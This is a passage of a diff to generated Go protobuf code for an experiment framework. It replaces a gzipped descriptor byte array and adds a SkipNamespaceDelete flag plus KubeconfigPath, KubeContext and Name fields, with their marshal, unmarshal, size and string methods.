0x8d, 0x1d, 0x8b, 0x06, 0xd3, 0x87, 0x92, 0xfe, 0x2d, 0x84, 0x1e, 0x40, 0x49, 0x35, 0xa3, 0xd7, - 0xfc, 0x54, 0xeb, 0xa8, 0x4e, 0x25, 0xcb, 0x8c, 0x26, 0x3e, 0x2a, 0x96, 0x8d, 0x46, 0xfe, 0x51, - 0xb1, 0x9c, 0x6f, 0x14, 0xcc, 0x5f, 0x1b, 0x00, 0x33, 0x0e, 0x7a, 0x1f, 0x8a, 0xe9, 0xa2, 0xf5, - 0xe5, 0xbe, 0x44, 0x04, 0x58, 0xb2, 0xd0, 0xf7, 0xa0, 0x9c, 0xfc, 0xce, 0x4d, 0xdf, 0x98, 0xaf, - 0x3d, 0xe1, 0x94, 0x9a, 0xbe, 0xf2, 0x0a, 0xb3, 0x57, 0xde, 0xbd, 0x3f, 0xa6, 0x71, 0x08, 0xff, - 0xa8, 0x01, 0xb5, 0xe1, 0x71, 0x07, 0x1f, 0x5b, 0x27, 0xfd, 0xcf, 0xfb, 0x7b, 0xb8, 0x91, 0x43, - 0xd7, 0x60, 0x5d, 0x21, 0x9f, 0x1d, 0xe1, 0xc7, 0x07, 0x47, 0x9d, 0xdd, 0x61, 0xc3, 0x40, 0x9b, - 0x70, 0x53, 0x81, 0x4f, 0xf6, 0x8e, 0x71, 0xbf, 0x67, 0xe1, 0xbd, 0xde, 0x11, 0xde, 0xdd, 0xc3, - 0xc3, 0x46, 0x1e, 0xad, 0x43, 0x75, 0x78, 0x7c, 0x34, 0x48, 0x3c, 0x14, 0x10, 0x82, 0xba, 0x04, - 0x66, 0x0e, 0x8a, 0xe8, 0x16, 0xdc, 0x90, 0xd8, 0x15, 0xfb, 0x15, 0x54, 0x82, 0x02, 0xfe, 0xf4, - 0xb0, 0xb1, 0x8a, 0x00, 0x56, 0xbb, 0x9f, 0xe2, 0xc3, 0xfe, 0x61, 0xa3, 0xd4, 0xed, 0xbe, 0x78, - 0xd9, 0xca, 0x7d, 0xf9, 0xb2, 0x95, 0xfb, 0xea, 0x65, 0xcb, 0xf8, 0xd5, 0xb4, 0x65, 0xfc, 0x69, - 0xda, 0x32, 0xfe, 0x36, 0x6d, 0x19, 0x2f, 0xa6, 0x2d, 0xe3, 0x1f, 0xd3, 0x96, 0xf1, 0xcf, 0x69, - 0x2b, 0xf7, 0xd5, 0xb4, 0x65, 0xfc, 0xee, 0x55, 0x2b, 0xf7, 0xe2, 0x55, 0x2b, 0xf7, 0xe5, 0xab, - 0x56, 0xee, 0xf3, 0x5a, 0xf6, 0xaf, 0x84, 0xd3, 0x55, 0x99, 0x9b, 0x0f, 0xff, 0x13, 0x00, 0x00, - 0xff, 0xff, 0x11, 0xaf, 0xeb, 0x55, 0x78, 0x10, 0x00, 0x00, + // 1859 bytes of a gzipped FileDescriptorProto + 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xac, 0x58, 0xcf, 0x73, 0x1b, 0x49, + 0xf5, 0xd7, 0x48, 0xb2, 0x25, 0x3d, 0xc9, 0xb2, 0xdc, 0x8e, 0xf3, 0x55, 0xbc, 0x29, 0x39, 0xab, + 0xad, 0x2f, 0x84, 0xb0, 0x6b, 0x13, 0x2f, 0x3f, 0xcc, 0x66, 0xd9, 0x2a, 0x49, 0x36, 0x58, 0x89, + 0x63, 0x8b, 0x96, 0xd7, 0x0b, 0x5b, 0x54, 0x4d, 0x8d, 0x67, 0xda, 0xf2, 0x94, 0x47, 0x33, 0x93, + 0xe9, 0x56, 0xd6, 0xe6, 0xc4, 0x85, 0xe2, 0x44, 0x15, 0x07, 0xf8, 0x0f, 0x38, 0xec, 0x9f, 0xc0, + 0x9d, 0x03, 0x70, 0xcb, 0x81, 0xc3, 0x9e, 0x5c, 0x44, 0xb9, 0x70, 0xdc, 0xff, 0x00, 0xaa, 0x5f, + 0xf7, 0x8c, 0x46, 0xb2, 0x92, 0x40, 0x15, 0xb7, 0x9e, 0x4f, 0x7f, 0xde, 0xeb, 0xf7, 0x5e, 0xbf, + 0x1f, 0x2d, 0xc1, 0x77, 0x79, 0x64, 0x6f, 0xb1, 0x6d, 0x66, 0x0a, 0xc6, 0xc5, 0x56, 0xc8, 0xa2, + 0x33, 0x53, 0x04, 0x81, 0xb7, 0xc5, 0x2e, 0x43, 0x16, 0xb9, 0x43, 0xe6, 0x8b, 0xf0, 0x34, 0xf5, + 0xb1, 0x19, 0x46, 0x81, 0x08, 0x48, 0x25, 0xbc, 0xdc, 0x4c, 0xb8, 0xeb, 0x8d, 0x41, 0x10, 0x0c, + 0x3c, 0xb6, 0x85, 0x7b, 0xa7, 0xa3, 0xb3, 0x2d, 0x67, 0x14, 0x59, 0xc2, 0x0d, 0x7c, 0xc5, 0x5e, + 0xbf, 0x35, 0x08, 0x06, 0x01, 0x2e, 0xb7, 0xe4, 0x4a, 0xa1, 0xcd, 0x7f, 0x65, 0xa1, 0xba, 0x97, + 0x28, 0xee, 0x87, 0xcc, 0x26, 0x8f, 0xa0, 0xfc, 0xdc, 0xfd, 0xa5, 0xcb, 0x22, 0x93, 0x87, 0xcc, + 0xae, 0x1b, 0xf7, 0x8c, 0xfb, 0xe5, 0xed, 0xf5, 0xcd, 0xf4, 0x61, 0x9b, 0x9f, 0x05, 0xd1, 0x85, + 0x17, 0x58, 0x8e, 0x14, 0xa0, 0xa0, 0xe8, 0x28, 0xdc, 0x82, 0xea, 0x17, 0x7a, 0x0f, 0xc5, 0x79, + 0x3d, 0x7b, 0x2f, 0xf7, 0x16, 0xf9, 0xa5, 0x2f, 0x52, 0x5f, 0x9c, 0x3c, 0x82, 0xca, 0x90, 0x89, + 0xc8, 0xb5, 0xb5, 0x82, 0x1c, 0x2a, 0xa8, 0x4f, 0x2b, 0x78, 0x8a, 0x0c, 0x14, 0x2f, 0x0f, 0x93, + 0x35, 0x27, 0x1f, 0x43, 0xc5, 0xf6, 0x46, 0x5c, 0xc4, 0xd6, 0xe7, 0xd1, 0xfa, 0x3b, 0xd3, 0xc2, + 0x1d, 0xc5, 0x50, 0xd2, 0xf6, 0xe4, 0x83, 0x7c, 0x07, 0x8a, 0xd1, 0xc8, 0x57, 0x92, 0x0b, 0x28, + 0xb9, 0x36, 0x2d, 0x49, 0x47, 0x3e, 0x4a, 0x15, 0x22, 0xb5, 0x20, 0xef, 0x03, 0xd8, 0xc1, 0x70, + 0xe8, 0x0a, 0x93, 0x9f, 0x5b, 0xf5, 0xc5, 0x7b, 0xc6, 0xfd, 0x52, 0x7b, 0x69, 0x7c, 0xbd, 0x51, + 0xea, 0x20, 0xda, 0xdf, 0x6f, 0xd1, 0x92, 0x22, 0xf4, 0xcf, 0x2d, 0x42, 0x20, 0x2f, 0xac, 0x01, + 0xaf, 0x17, 0xee, 0xe5, 0xee, 0x97, 0x28, 0xae, 0x9b, 0x7f, 0x31, 0xa0, 0x92, 0x0e, 0x87, 0x24, + 0xf9, 0xd6, 0x90, 0x61, 0xe0, 0x4b, 0x14, 0xd7, 0x32, 0x26, 0x0e, 0x0b, 0xbd, 0xe0, 0xca, 0xe4, + 0x82, 0x85, 0x71, 0x50, 0x67, 0x62, 0xb2, 0x8b, 0x8c, 0xbe, 0x60, 0x21, 0x2d, 0x3b, 0xc9, 0x9a, + 0x93, 0x1f, 0x41, 0xe5, 0x9c, 0x59, 0x9e, 0x38, 0xb7, 0xcf, 0x99, 0x7d, 0x11, 0x07, 0x74, 0x26, + 0x26, 0xfb, 0xc8, 0xe8, 0x48, 0x06, 0x9d, 0xa2, 0x93, 0x6f, 0xc2, 0xb2, 0x65, 0xcb, 0x44, 0x32, + 0x39, 0xf3, 0x98, 0x2d, 0x82, 0x08, 0xa3, 0x5a, 0xa2, 0x55, 0x05, 0xf7, 0x35, 0xda, 0xfc, 0x9b, + 0x01, 0x30, 0xb1, 0x81, 0x74, 0xa0, 0x1c, 0x46, 0x2c, 0x62, 0xbe, 0xc3, 0x22, 0xe6, 0xe8, 0x3c, + 0xda, 0x98, 0x3e, 0xb5, 0x37, 0x21, 0x28, 0xc9, 0xfd, 0x0c, 0x4d, 0x4b, 0x91, 0x8f, 0xa0, 0xc8, + 0x2f, 0xac, 0xb3, 0xb3, 0xc0, 0x73, 0xea, 0x59, 0xd4, 0x70, 0x77, 0x5a, 0x43, 0x5f, 0xef, 0x26, + 0xe2, 0x09, 0x9f, 0x7c, 0x1b, 0xb2, 0xe1, 0x65, 0x3d, 0x37, 0x2f, 0x03, 0x7a, 0x97, 0x9d, 0x83, + 0x6e, 0x22, 0x92, 0x0d, 0x2f, 0xdb, 0x4b, 0xa0, 0x63, 0x66, 0x8a, 0xab, 0x90, 0x35, 0x7f, 0x6f, + 0x40, 0x39, 0x15, 0x12, 0xf2, 0x31, 0xe4, 0x2e, 0x76, 0xf8, 0x7c, 0x27, 0x9e, 0xec, 0xf4, 0x7b, + 0x81, 0xc3, 0x29, 0xb3, 0x9c, 0x2b, 0x64, 0xb7, 0x0b, 0xe3, 0xeb, 0x8d, 0xdc, 0x93, 0x9d, 0xfe, + 0x7e, 0x86, 0x4a, 0x31, 0xf2, 0x43, 0xc8, 0x85, 0x97, 0xde, 0x7c, 0x07, 0x7a, 0x97, 0x07, 0xa9, + 0x83, 0x94, 0xa8, 0xc4, 0x32, 0x54, 0xca, 0xb4, 0x2b, 0x00, 0x78, 0x0f, 0xca, 0xac, 0x87, 0xb0, + 0x72, 0xe3, 0x34, 0x72, 0x17, 0x4a, 0x32, 0x49, 0x78, 0x68, 0xd9, 0x71, 0xd6, 0x4c, 0x80, 0xe6, + 0x11, 0x54, 0xa7, 0x8f, 0x20, 0xb7, 0x61, 0x91, 0xdb, 0x91, 0x1b, 0x0a, 0x4d, 0xd6, 0x5f, 0xe4, + 0xff, 0xa1, 0xca, 0x47, 0xb6, 0xcd, 0x38, 0x37, 0xed, 0xc0, 0x1b, 0x0d, 0x7d, 0x34, 0xb8, 0x44, + 0x97, 0x34, 0xda, 0x41, 0xb0, 0xf9, 0x0b, 0x28, 0xf5, 0x2c, 0x61, 0x9f, 0x63, 0xb2, 0xde, 0x85, + 0xfc, 0x95, 0x35, 0xf4, 0x94, 0xa6, 0x76, 0x71, 0x7c, 0xbd, 0x91, 0xff, 0x79, 0xeb, 0xe9, 0x01, + 0x45, 0x94, 0x3c, 0x84, 0x45, 0x61, 0x45, 0x03, 0x26, 0xb4, 0xeb, 0xb3, 0xb7, 0x20, 0xd5, 0x1c, + 0x23, 0x81, 0x6a, 0x62, 0xf3, 0x37, 0x59, 0x28, 0xa7, 0x70, 0xf2, 0x2d, 0x28, 0x59, 0xa1, 0x6b, + 0x0e, 0xa2, 0x60, 0x14, 0xea, 0x53, 0x2a, 0xe3, 0xeb, 0x8d, 0x62, 0xab, 0xd7, 0xfd, 0x89, 0xc4, + 0x68, 0xd1, 0x0a, 0x5d, 0x5c, 0x91, 0x2d, 0x28, 0x4b, 0xea, 0x73, 0x16, 0x71, 0x37, 0xd0, 0xc6, + 0xb7, 0xab, 0xe3, 0xeb, 0x0d, 0x68, 0xf5, 0xba, 0x27, 0x0a, 0xa5, 0x60, 0x85, 0xae, 0x5e, 0xcb, + 0x4a, 0xbb, 0x70, 0x7d, 0x07, 0x53, 0xa4, 0x44, 0x71, 0x9d, 0x54, 0x5f, 0x3e, 0x55, 0x7d, 0x53, + 0x01, 0x5e, 0x98, 0x09, 0xb0, 0x0c, 0x9b, 0x67, 0x9d, 0x32, 0x6f, 0x52, 0x1e, 0x8b, 0x2a, 0x6c, + 0x88, 0xc6, 0xd5, 0x41, 0xb6, 0x60, 0xd5, 0xf2, 0xfd, 0x40, 0x58, 0xd3, 0xa5, 0x54, 0x40, 0x2e, + 0x99, 0x6c, 0x25, 0xe5, 0xf4, 0xa5, 0x01, 0x2b, 0x37, 0xea, 0x43, 0x36, 0x1c, 0x19, 0x5a, 0x33, + 0xb4, 0xc4, 0xb9, 0xcc, 0xc7, 0x5c, 0xdc, 0x70, 0x64, 0xd8, 0x7b, 0x12, 0xa4, 0x25, 0x49, 0xc0, + 0x25, 0x79, 0x08, 0x85, 0x50, 0x06, 0x93, 0xc5, 0x2d, 0xe3, 0xff, 0xe6, 0xdc, 0x80, 0xea, 0x68, + 0x9a, 0x47, 0xb6, 0x61, 0x8d, 0x5f, 0xb8, 0xa1, 0x99, 0x38, 0x68, 0x3a, 0xcc, 0x63, 0x82, 0x61, + 0x94, 0x8a, 0x74, 0x55, 0x6e, 0x1e, 0xc6, 0x7b, 0xbb, 0xb8, 0xd5, 0xfc, 0xad, 0x01, 0xd5, 0xe9, + 0x42, 0x24, 0xef, 0xc1, 0x52, 0x5c, 0x88, 0x68, 0xab, 0xce, 0xb5, 0x4a, 0x0c, 0x4a, 0xfb, 0xa6, + 0x48, 0x56, 0x34, 0x50, 0x46, 0xa6, 0x48, 0xad, 0x68, 0x30, 0xe5, 0x43, 0xee, 0x3f, 0xf3, 0xa1, + 0x79, 0x05, 0xe5, 0x54, 0x85, 0xcb, 0x3b, 0x45, 0xed, 0x86, 0x6a, 0xbb, 0x72, 0x4d, 0x1a, 0x00, + 0x89, 0x87, 0xf1, 0xb9, 0x29, 0x84, 0x7c, 0x1f, 0xaa, 0x9c, 0x09, 0x33, 0x1e, 0x26, 0xae, 0xca, + 0x92, 0x62, 0xbb, 0x36, 0xbe, 0xde, 0xa8, 0xf4, 0x99, 0xd0, 0x33, 0xa4, 0xbb, 0x4b, 0x2b, 0x7c, + 0xf2, 0xe5, 0x34, 0xff, 0x64, 0x00, 0x4c, 0x86, 0x13, 0xd9, 0x51, 0x95, 0xaf, 0xfa, 0xc6, 0x3b, + 0x37, 0x2a, 0xbf, 0x8f, 0x95, 0x27, 0x99, 0xb3, 0x85, 0x4f, 0x76, 0x20, 0x1f, 0x46, 0xc1, 0x50, + 0x57, 0x4e, 0x73, 0xb6, 0x6f, 0x06, 0x43, 0x26, 0xce, 0xd9, 0x88, 0xf7, 0xed, 0xc8, 0x0a, 0x99, + 0xd4, 0xb0, 0x9f, 0xa1, 0x28, 0x31, 0xaf, 0x61, 0x3b, 0xf3, 0x1a, 0xb6, 0xec, 0x79, 0x7a, 0xd2, + 0x62, 0x73, 0x19, 0xe7, 0x60, 0x69, 0xca, 0xa6, 0xd7, 0x76, 0x8a, 0xbb, 0x50, 0xe2, 0x22, 0x62, + 0xd6, 0xd0, 0xf5, 0x07, 0x68, 0x60, 0x91, 0x4e, 0x00, 0xf2, 0x63, 0x58, 0xb1, 0x03, 0x4f, 0x9e, + 0x21, 0x6d, 0x90, 0x6f, 0x8b, 0xc0, 0x49, 0xda, 0xb0, 0x7a, 0xa5, 0x6c, 0xc6, 0xaf, 0x94, 0xcd, + 0x5d, 0xfd, 0x4a, 0xa1, 0xb5, 0x89, 0x4c, 0x0f, 0x45, 0xc8, 0xcf, 0x60, 0x59, 0xb0, 0x61, 0xe8, + 0x59, 0x82, 0x99, 0xcf, 0x2d, 0x6f, 0xc4, 0x78, 0x3d, 0x8f, 0x09, 0xb0, 0xf5, 0x86, 0x38, 0x6e, + 0x1e, 0x6b, 0x91, 0x13, 0x94, 0xd8, 0xf3, 0x45, 0x74, 0x45, 0xab, 0x62, 0x0a, 0x24, 0x14, 0x96, + 0x84, 0x75, 0xea, 0x31, 0x33, 0x18, 0x89, 0x70, 0x24, 0x78, 0x7d, 0x01, 0xf5, 0x7e, 0xf0, 0x46, + 0xbd, 0x52, 0xe0, 0x48, 0xf1, 0x95, 0xd6, 0x8a, 0x48, 0x41, 0xeb, 0x2d, 0x58, 0x9d, 0x73, 0x34, + 0xa9, 0x41, 0xee, 0x82, 0x5d, 0xe9, 0xf8, 0xc9, 0x25, 0xb9, 0x05, 0x0b, 0xe8, 0x8d, 0xee, 0xae, + 0xea, 0xe3, 0xa3, 0xec, 0x8e, 0xb1, 0x7e, 0x0a, 0x2b, 0x37, 0x4e, 0x99, 0xa3, 0xe0, 0x07, 0x69, + 0x05, 0xe5, 0xed, 0x77, 0x5f, 0x63, 0xb5, 0xd2, 0x72, 0xe0, 0x72, 0x91, 0x3a, 0xa3, 0x49, 0x61, + 0x75, 0x0e, 0x83, 0x3c, 0x82, 0x42, 0x1c, 0x0b, 0x03, 0x63, 0xf1, 0x66, 0xad, 0xaa, 0xdc, 0xb4, + 0x44, 0xf3, 0xcf, 0xc6, 0x0d, 0xa5, 0x98, 0x3e, 0x8f, 0x61, 0x89, 0xbb, 0xfe, 0xc0, 0x63, 0xa6, + 0x4a, 0x33, 0x5d, 0x06, 0xef, 0xcd, 0x4c, 0x70, 0xa4, 0xa8, 0x9a, 0xe9, 0x5d, 0x1e, 0x28, 0xf9, + 0xfd, 0x0c, 0xad, 0xf0, 0xd4, 0x06, 0xf9, 0x29, 0xac, 0x38, 0x96, 0xb0, 0x4c, 0x2f, 0xc0, 0xf1, + 0x34, 0xf2, 0x05, 0x8b, 0x74, 0x00, 0x66, 0xf4, 0xed, 0x5a, 0xc2, 0x3a, 0x08, 0xe4, 0xb8, 0x42, + 0x52, 0xa2, 0x6f, 0xd9, 0x99, 0xde, 0x90, 0xe9, 0xaf, 0x3c, 0xc0, 0x07, 0x5f, 0xf3, 0x0f, 0x06, + 0xac, 0xcd, 0xb5, 0x45, 0xb6, 0x29, 0xe1, 0x0e, 0x19, 0x17, 0xd6, 0x30, 0x94, 0xa3, 0x31, 0xee, + 0x65, 0x09, 0xd8, 0x09, 0x3c, 0xb2, 0x91, 0x14, 0x13, 0xce, 0x0f, 0x75, 0xb9, 0xa0, 0x20, 0xd9, + 0x2f, 0xc9, 0x3b, 0x50, 0xc2, 0x6b, 0x40, 0x0d, 0x6a, 0xe4, 0x14, 0x11, 0x90, 0xd2, 0x77, 0xa0, + 0x28, 0xac, 0x81, 0xdc, 0x52, 0x49, 0x5e, 0xa2, 0x05, 0x61, 0x0d, 0x3a, 0x81, 0xc7, 0xe5, 0xb3, + 0x6a, 0x6d, 0xae, 0x4f, 0xff, 0x23, 0xbb, 0x1e, 0x00, 0x70, 0xf6, 0xcc, 0x74, 0x9d, 0x89, 0x61, + 0x6a, 0xc4, 0xf6, 0xd9, 0xb3, 0xee, 0x6e, 0x27, 0xf0, 0x68, 0x91, 0xb3, 0x67, 0x5d, 0x47, 0x2a, + 0xfb, 0x04, 0x96, 0x74, 0xc8, 0x74, 0x59, 0xe7, 0xdf, 0x56, 0xd6, 0x15, 0xc5, 0x57, 0x25, 0xdd, + 0xfc, 0x7b, 0x0e, 0x6e, 0xcd, 0xeb, 0x5d, 0x6f, 0x7e, 0xc3, 0x90, 0x6f, 0xc0, 0xf2, 0x50, 0xb6, + 0x76, 0x53, 0x0d, 0x5a, 0x59, 0x0f, 0xfa, 0x69, 0x82, 0xf0, 0x81, 0x44, 0x9f, 0xb0, 0x2b, 0xf2, + 0x00, 0x56, 0xd2, 0x3c, 0x55, 0x25, 0x2a, 0xd4, 0xcb, 0x13, 0x26, 0x96, 0xa7, 0x1c, 0x0a, 0x61, + 0x10, 0x09, 0xf4, 0x60, 0x81, 0xe2, 0x5a, 0xba, 0xc7, 0xd1, 0xa6, 0xd8, 0xbd, 0x85, 0xb7, 0xba, + 0xa7, 0xf8, 0xba, 0x63, 0x9d, 0x24, 0x3f, 0x5d, 0xd0, 0xf6, 0xfa, 0x22, 0x96, 0xd2, 0x87, 0x6f, + 0xef, 0xdd, 0xfa, 0xf7, 0x0c, 0xce, 0x55, 0xd5, 0x5c, 0xca, 0x93, 0x1b, 0xc2, 0x27, 0xf8, 0xc5, + 0xe8, 0x94, 0xd9, 0x81, 0x7f, 0xe6, 0x0e, 0xd4, 0x38, 0x55, 0xef, 0x86, 0xea, 0x04, 0xc6, 0x81, + 0xfa, 0x2e, 0x54, 0x24, 0x62, 0xda, 0x81, 0x2f, 0xd8, 0xa5, 0xa8, 0x17, 0x91, 0x55, 0x96, 0x58, + 0x47, 0x41, 0xc9, 0x03, 0xa7, 0x34, 0x79, 0xe0, 0xac, 0x7f, 0x02, 0xb5, 0x59, 0x03, 0xfe, 0x9b, + 0xc6, 0xd5, 0x3c, 0x81, 0x72, 0xea, 0x37, 0x95, 0xcc, 0x74, 0x7f, 0x34, 0x34, 0xfd, 0xc0, 0x61, + 0xea, 0xc9, 0xbc, 0x40, 0x8b, 0xfe, 0x68, 0x78, 0x28, 0xbf, 0xc9, 0x03, 0xc8, 0xcb, 0x0d, 0x5d, + 0xbb, 0xb7, 0xa7, 0x63, 0x23, 0x29, 0xd8, 0x5b, 0x90, 0xd3, 0xfc, 0x00, 0x8a, 0x31, 0x22, 0x5d, + 0x1b, 0x5a, 0xf6, 0xb9, 0xeb, 0x33, 0x9c, 0x56, 0xda, 0xb0, 0xb2, 0xc6, 0x8e, 0xe5, 0x00, 0xeb, + 0x42, 0x41, 0xff, 0x40, 0x23, 0xdb, 0x50, 0x50, 0xc3, 0xee, 0x35, 0xbf, 0x1f, 0x5b, 0x6a, 0x12, + 0x62, 0x1b, 0xd3, 0xc4, 0xc7, 0xf9, 0xa2, 0x51, 0xcb, 0x3e, 0xce, 0x17, 0xb3, 0xb5, 0x5c, 0xf3, + 0xd7, 0x06, 0xc0, 0x84, 0x43, 0xde, 0x87, 0x7c, 0x72, 0x68, 0x75, 0xbe, 0x2e, 0x69, 0x01, 0x45, + 0x16, 0xf9, 0x1e, 0x14, 0xe3, 0x1f, 0xdf, 0xc9, 0xc3, 0xf7, 0xb5, 0x19, 0x94, 0x50, 0x93, 0x9b, + 0xc9, 0x4d, 0x6e, 0xe6, 0xc1, 0x1f, 0x13, 0x3b, 0xa4, 0x7e, 0x52, 0x83, 0x4a, 0xff, 0xb8, 0x45, + 0x8f, 0xcd, 0x93, 0xee, 0xe7, 0xdd, 0x3d, 0x5a, 0xcb, 0x90, 0x55, 0x58, 0x56, 0xc8, 0x67, 0x47, + 0xf4, 0xc9, 0xc1, 0x51, 0x6b, 0xb7, 0x5f, 0x33, 0xc8, 0x3a, 0xdc, 0x56, 0xe0, 0xd3, 0xbd, 0x63, + 0xda, 0xed, 0x98, 0x74, 0xaf, 0x73, 0x44, 0x77, 0xf7, 0x68, 0xbf, 0x96, 0x25, 0xcb, 0x50, 0xee, + 0x1f, 0x1f, 0xf5, 0x62, 0x0d, 0x39, 0x42, 0xa0, 0x8a, 0xc0, 0x44, 0x41, 0x9e, 0xdc, 0x81, 0x35, + 0xc4, 0x6e, 0xc8, 0x2f, 0x90, 0x02, 0xe4, 0xe8, 0xa7, 0x87, 0xb5, 0x45, 0x02, 0xb0, 0xd8, 0xfe, + 0x94, 0x1e, 0x76, 0x0f, 0x6b, 0x85, 0x76, 0xfb, 0xc5, 0xcb, 0x46, 0xe6, 0xab, 0x97, 0x8d, 0xcc, + 0xd7, 0x2f, 0x1b, 0xc6, 0xaf, 0xc6, 0x0d, 0xe3, 0xcb, 0x71, 0xc3, 0xf8, 0xeb, 0xb8, 0x61, 0xbc, + 0x18, 0x37, 0x8c, 0x7f, 0x8c, 0x1b, 0xc6, 0x3f, 0xc7, 0x8d, 0xcc, 0xd7, 0xe3, 0x86, 0xf1, 0xbb, + 0x57, 0x8d, 0xcc, 0x8b, 0x57, 0x8d, 0xcc, 0x57, 0xaf, 0x1a, 0x99, 0xcf, 0x2b, 0xe9, 0xff, 0x37, + 0x4e, 0x17, 0x31, 0x36, 0x1f, 0xfe, 0x3b, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xd3, 0xa2, 0xe8, 0x0d, + 0x11, 0x00, 0x00, } func (x ActionType) String() string { @@ -2117,6 +2154,9 @@ func (this *PrerenderedDeploy) Equal(that interface{}) bool { return false } } + if this.SkipNamespaceDelete != that1.SkipNamespaceDelete { + return false + } return true } func (this *SkaffoldDeploy) Equal(that interface{}) bool { @@ -2546,6 +2586,15 @@ func (this *PrometheusScrapeSpec) Equal(that interface{}) bool { return false } } + if this.KubeconfigPath != that1.KubeconfigPath { + return false + } + if this.KubeContext != that1.KubeContext { + return false + } + if this.Name != that1.Name { + return false + } return true } func (this *ClusterSpec) Equal(that interface{}) bool { @@ -2819,12 +2868,13 @@ func (this *PrerenderedDeploy) GoString() string { if this == nil { return "nil" } - s := make([]string, 0, 6) + s := make([]string, 0, 7) s = append(s, "&experimentpb.PrerenderedDeploy{") s = append(s, "YAMLPaths: "+fmt.Sprintf("%#v", this.YAMLPaths)+",\n") if this.Patches != nil { s = append(s, "Patches: "+fmt.Sprintf("%#v", this.Patches)+",\n") } + s = append(s, "SkipNamespaceDelete: "+fmt.Sprintf("%#v", this.SkipNamespaceDelete)+",\n") s = append(s, "}") return strings.Join(s, "") } @@ -2995,7 +3045,7 @@ func (this *PrometheusScrapeSpec) GoString() string { if this == nil { return "nil" } - s := make([]string, 0, 10) + s := make([]string, 0, 13) s = append(s, "&experimentpb.PrometheusScrapeSpec{") s = append(s, "Namespace: "+fmt.Sprintf("%#v", this.Namespace)+",\n") s = append(s, "MatchLabelKey: "+fmt.Sprintf("%#v", this.MatchLabelKey)+",\n") @@ -3017,6 +3067,9 @@ func (this *PrometheusScrapeSpec) GoString() string { if this.MetricNames != nil { s = append(s, "MetricNames: "+mapStringForMetricNames+",\n") } + s = append(s, "KubeconfigPath: "+fmt.Sprintf("%#v", this.KubeconfigPath)+",\n") + s = append(s, "KubeContext: "+fmt.Sprintf("%#v", this.KubeContext)+",\n") + s = append(s, "Name: "+fmt.Sprintf("%#v", this.Name)+",\n") s = append(s, "}") return strings.Join(s, "") } @@ -3615,6 +3668,16 @@ func (m *PrerenderedDeploy) MarshalToSizedBuffer(dAtA []byte) (int, error) { _ = i var l int _ = l + if m.SkipNamespaceDelete { + i-- + if m.SkipNamespaceDelete { + dAtA[i] = 1 + } else { + dAtA[i] = 0 + } + i-- + dAtA[i] = 0x18 + } if len(m.Patches) > 0 { for iNdEx := len(m.Patches) - 1; iNdEx >= 0; iNdEx-- { { @@ -4165,6 +4228,27 @@ func (m *PrometheusScrapeSpec) MarshalToSizedBuffer(dAtA []byte) (int, error) { _ = i var l int _ = l + if len(m.Name) > 0 { + i -= len(m.Name) + copy(dAtA[i:], m.Name) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.Name))) + i-- + dAtA[i] = 0x4a + } + if len(m.KubeContext) > 0 { + i -= len(m.KubeContext) + copy(dAtA[i:], m.KubeContext) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.KubeContext))) + i-- + dAtA[i] = 0x42 + } + if len(m.KubeconfigPath) > 0 { + i -= len(m.KubeconfigPath) + copy(dAtA[i:], m.KubeconfigPath) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.KubeconfigPath))) + i-- + dAtA[i] = 0x3a + } if len(m.MetricNames) > 0 { for k := range m.MetricNames { v := m.MetricNames[k] @@ -4648,6 +4732,9 @@ func (m *PrerenderedDeploy) Size() (n int) { n += 1 + l + sovExperiment(uint64(l)) } } + if m.SkipNamespaceDelete { + n += 2 + } return n } @@ -4917,6 +5004,18 @@ func (m *PrometheusScrapeSpec) Size() (n int) { n += mapEntrySize + 1 + sovExperiment(uint64(mapEntrySize)) } } + l = len(m.KubeconfigPath) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } + l = len(m.KubeContext) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } + l = len(m.Name) + if l > 0 { + n += 1 + l + sovExperiment(uint64(l)) + } return n } @@ -5169,6 +5268,7 @@ func (this *PrerenderedDeploy) String() string { s := strings.Join([]string{`&PrerenderedDeploy{`, `YAMLPaths:` + fmt.Sprintf("%v", this.YAMLPaths) + `,`, `Patches:` + repeatedStringForPatches + `,`, + `SkipNamespaceDelete:` + fmt.Sprintf("%v", this.SkipNamespaceDelete) + `,`, `}`, }, "") return s @@ -5359,6 +5459,9 @@ func (this *PrometheusScrapeSpec) String() string { `Port:` + fmt.Sprintf("%v", this.Port) + `,`, `ScrapePeriod:` + strings.Replace(fmt.Sprintf("%v", this.ScrapePeriod), "Duration", "types.Duration", 1) + `,`, `MetricNames:` + mapStringForMetricNames + `,`, + `KubeconfigPath:` + fmt.Sprintf("%v", this.KubeconfigPath) + `,`, + `KubeContext:` + fmt.Sprintf("%v", this.KubeContext) + `,`, + `Name:` + fmt.Sprintf("%v", this.Name) + `,`, `}`, }, "") return s @@ -6849,6 +6952,26 @@ func (m *PrerenderedDeploy) Unmarshal(dAtA []byte) error { return err } iNdEx = postIndex + case 3: + if wireType != 0 { + return fmt.Errorf("proto: wrong wireType = %d for field SkipNamespaceDelete", wireType) + } + var v int + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + v |= int(b&0x7F) << shift + if b < 0x80 { + break + } + } + m.SkipNamespaceDelete = bool(v != 0) default: iNdEx = preIndex skippy, err := skipExperiment(dAtA[iNdEx:]) @@ -8569,6 +8692,102 @@ func (m *PrometheusScrapeSpec) Unmarshal(dAtA []byte) error { } m.MetricNames[mapkey] = mapvalue iNdEx = postIndex + case 7: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field KubeconfigPath", wireType) + } + var stringLen uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowExperiment + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLen |= uint64(b&0x7F) << shift + if b < 0x80 { + break + } + } + intStringLen := int(stringLen) + if intStringLen < 0 { + return ErrInvalidLengthExperiment + } + postIndex := iNdEx + intStringLen + if postIndex < 0 { + return ErrInvalidLengthExperiment + } + if postIndex > l { + return io.ErrUnexpectedEOF + } + m.KubeconfigPath = string(dAtA[iNdEx:postIndex]) + 